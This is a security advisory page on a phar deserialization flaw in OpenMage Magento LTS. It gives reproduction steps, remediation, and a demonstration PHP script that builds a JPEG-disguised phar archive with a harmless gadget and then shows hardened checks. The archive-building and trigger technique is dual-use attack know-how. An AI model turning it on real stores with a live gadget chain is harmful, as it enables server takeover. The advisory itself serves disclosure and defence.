OpenMage Magento LTS Phar Deserialization Vulnerability Leading to Arbitrary Code Execution

Vulnerability

A vulnerability in OpenMage Magento Long Term Support (LTS) versions prior to 20.17.0 allows arbitrary code execution through phar deserialization. The issue arises during image validation and media handling, where PHP filesystem functions such as 'getimagesize()', 'file_exists()' and 'is_readable()' are called on paths that an attacker can cause to begin with the 'phar://' stream wrapper. When PHP opens a path through that wrapper it parses the archive's manifest and, on PHP versions before 8.0, passes the archive's metadata to 'unserialize()' before any file inside the archive is read, so a mere existence or size check on such a path instantiates attacker-chosen objects. An attacker who can upload a phar archive disguised as an image (the stub may start with image magic bytes as long as it ends with the '__HALT_COMPILER();' token) and steer one of these functions to a 'phar://' path to it can therefore reach a '__wakeup()' or '__destruct()' gadget in any class the application autoloads and execute arbitrary code.

Impact

Successful exploitation gives the attacker arbitrary code execution on the web server in the context of the PHP process serving the store, and with it access to the store's code, configuration and database credentials.

Reproduction

To reproduce this vulnerability, create a phar archive whose stub begins with image magic bytes (for example the JPEG 'FF D8 FF' header) and ends with the mandatory '__HALT_COMPILER();' token, and whose metadata is a serialized object of a class with a '__wakeup()' or '__destruct()' method that the application can autoload. Upload it through any vector that accepts image files, such as product images or CMS media. The payload is then triggered by causing one of the affected functions, such as 'getimagesize()', to be called with a 'phar://' path pointing at the uploaded file: opening the archive through the wrapper deserializes the phar metadata, and the embedded object's magic method executes the payload. A plain filesystem path to the uploaded file is harmless; the attacker must influence the prefix of the path string that reaches the function, or the application must build a 'phar://' path itself.

Remediation

Users should upgrade to OpenMage Magento LTS version 20.17.0, which removes support for ICO files (one vector for this attack) and disables the 'phar://' stream wrapper. If an immediate upgrade is not possible, unregister the wrapper at application bootstrap with 'stream_wrapper_unregister('phar')'. Note that no php.ini directive disables the wrapper on its own ('phar.readonly' only prevents creating archives); the only configuration-level alternative is to not load the phar extension where it is built as a shared module, which also breaks tools such as Composer that run under the same PHP. In addition, tighten upload validation: reject any path containing '://' before it reaches a filesystem function, decide whether an upload is an image by decoding it rather than by trusting its extension or leading bytes, and reject content containing the '__HALT_COMPILER' token that every phar-format archive carries (tar- and zip-based phars do not carry it, which is why the decode check, not the string match, is the primary control).
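The following PHP script is added here as an illustration; it is not code from OpenMage or from the advisory. It builds a harmless phar archive disguised as a JPEG, triggers the metadata deserialization through 'getimagesize()' as described in the Reproduction section, and shows the two application-level checks and the bootstrap hardening from the Remediation section. The 'Canary' class, the file names and the helper function names are assumptions made for the demonstration. Creating the archive requires 'phar.readonly' to be off ('php -d phar.readonly=0'), and the deserialization fires only on PHP 7.x, since PHP 8.0 stopped unserializing phar metadata when an archive is opened.

```php
<?php
// Added example (not OpenMage code): harmless end-to-end illustration of phar
// metadata deserialization and the checks that stop it.
// Run with:  php -d phar.readonly=0 phar_demo.php   (PHP 7.x; see lead-in)

// Stand-in for a real gadget: any class with __wakeup()/__destruct() that the
// application can autoload. This one only records that unserialize() reached it.
class Canary
{
    public static $fired = false;

    public function __wakeup()
    {
        self::$fired = true;   // a real gadget chain would run attacker code here
    }
}

// Build a phar archive whose stub starts with JPEG magic bytes. Extension and
// first-bytes checks see a JPEG; the phar loader sees an archive because the
// stub ends with the mandatory __HALT_COMPILER(); token.
function buildDisguisedPhar($dir)
{
    $pharPath = $dir . '/poc.phar';   // Phar only *creates* files named *.phar ...
    $jpgPath  = $dir . '/poc.jpg';    // ... but the wrapper *opens* any file name
    @unlink($pharPath);
    $phar = new Phar($pharPath);
    $phar->startBuffering();
    $phar->addFromString('x.txt', 'placeholder');
    $phar->setStub("\xFF\xD8\xFF\xE0JFIF\0<?php __HALT_COMPILER(); ?>");
    $phar->setMetadata(new Canary());  // serialized into the manifest on write
    $phar->stopBuffering();
    unset($phar);
    rename($pharPath, $jpgPath);
    return $jpgPath;
}

// Vulnerable pattern: the caller controls the entire path string, so it may
// carry a stream wrapper prefix. Opening phar:// parses the manifest and, on
// PHP 7, runs unserialize() on the metadata before a single image byte is read.
function vulnerableImageCheck($path)
{
    return @getimagesize($path) !== false;
}

// Hardened step 1: accept only plain filesystem paths below the upload root.
// This alone defeats phar://, php://, data:// and every other wrapper.
function isPlainPathUnder($path, $root)
{
    if (strpos($path, '://') !== false || strpos($path, "\0") !== false) {
        return false;
    }
    $real = realpath($path);
    $rootReal = realpath($root);
    return $real !== false && $rootReal !== false
        && strncmp($real, $rootReal . DIRECTORY_SEPARATOR, strlen($rootReal) + 1) === 0;
}

// Hardened step 2: decide "is this an image?" by decoding it, not by trusting
// the extension, magic bytes or getimagesize(). Phar-format archives always
// contain __HALT_COMPILER, so that is a cheap early reject, but tar- and
// zip-based phars do not, which is why the decode is the real test.
function isDecodableImage($path)
{
    $bytes = file_get_contents($path);
    if ($bytes === false || stripos($bytes, '__HALT_COMPILER') !== false) {
        return false;
    }
    $img = @imagecreatefromstring($bytes);
    if ($img === false) {
        return false;
    }
    imagedestroy($img);
    return true;
}

$tmp = sys_get_temp_dir();
$jpg = buildDisguisedPhar($tmp);

// Attacker-influenced path with a wrapper prefix, as in the advisory.
$hostile = 'phar://' . $jpg . '/x.txt';
vulnerableImageCheck($hostile);
echo 'vulnerable check reached the gadget: ', Canary::$fired ? 'yes' : 'no', PHP_EOL;

// The same upload through the hardened checks is rejected before anything is opened.
echo 'hardened path check:    ', isPlainPathUnder($hostile, $tmp) ? 'accepted' : 'rejected', PHP_EOL;
echo 'hardened content check: ', isDecodableImage($jpg) ? 'accepted' : 'rejected', PHP_EOL;

// Control: a genuine image (constructed here with GD) passes both hardened checks.
$png = $tmp . '/real.png';
$im = imagecreatetruecolor(2, 2);
imagepng($im, $png);
imagedestroy($im);
echo 'genuine image:          ', (isPlainPathUnder($png, $tmp) && isDecodableImage($png)) ? 'accepted' : 'rejected', PHP_EOL;

// Mitigation for deployments that cannot upgrade yet: drop the wrapper at
// bootstrap so no code path, validated or not, can open phar:// at all.
stream_wrapper_unregister('phar');
echo 'phar wrapper still registered: ', in_array('phar', stream_get_wrappers(), true) ? 'yes' : 'no', PHP_EOL;
```

On PHP 8.0 and later the vulnerable check no longer reaches 'Canary::__wakeup()', because the metadata stays serialized until 'Phar::getMetadata()' is called explicitly; the hardened checks remain worthwhile there, since the same wrapper-prefix weakness also exposes 'php://' and 'data://' paths to the filesystem functions.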

Added: Apr 20, 2026, 5:49 PM
Updated: Apr 20, 2026, 5:49 PM

Vulnerability Rating

Custom Algorithm

spread: 3.4
impact: 7.5
exploitability: 6.2
remediation: 8.3
relevance: 6.3
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.